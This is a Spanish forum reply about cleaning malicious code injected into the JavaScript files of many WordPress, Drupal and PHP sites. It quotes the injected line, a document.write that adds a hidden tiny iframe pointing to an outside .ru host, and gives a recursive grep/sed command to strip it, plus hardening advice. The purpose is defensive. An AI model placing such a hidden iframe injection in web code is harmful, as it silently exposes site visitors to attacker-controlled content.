Cita:
Iniciado por polsola 
Buenas, tengo un caso similar pero en mi caso me han inyectado código en mis archivos js, el problema es que tengo como 20 webs, entre Wordpress Drupal y php puro, de momento estoy comprobando uno por uno pero se os ocurre una solución mejor?
La linea por si a alguien le ocurre lo mismo es esta:
document.write('<iframe src="http://orderedvalidation.ru/properties?8" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
Muchas gracias!
Si tienes acceso a consola un comando los mostrados arriba o este
Código:
grep -Rl "orderedvalidation.ru" /home/ | while read filename ; do sed '/orderedvalidation.ru/d' $filename > tmpfile ;/bin/cp -pf tmpfile $filename ; done
eliminará todas las líneas en donde aparece la cadena orderedvalidation.ru recursivamente en el directorio /home
Adicionalmente cambia a FTP seguro y manten actualizados tus cms y plugins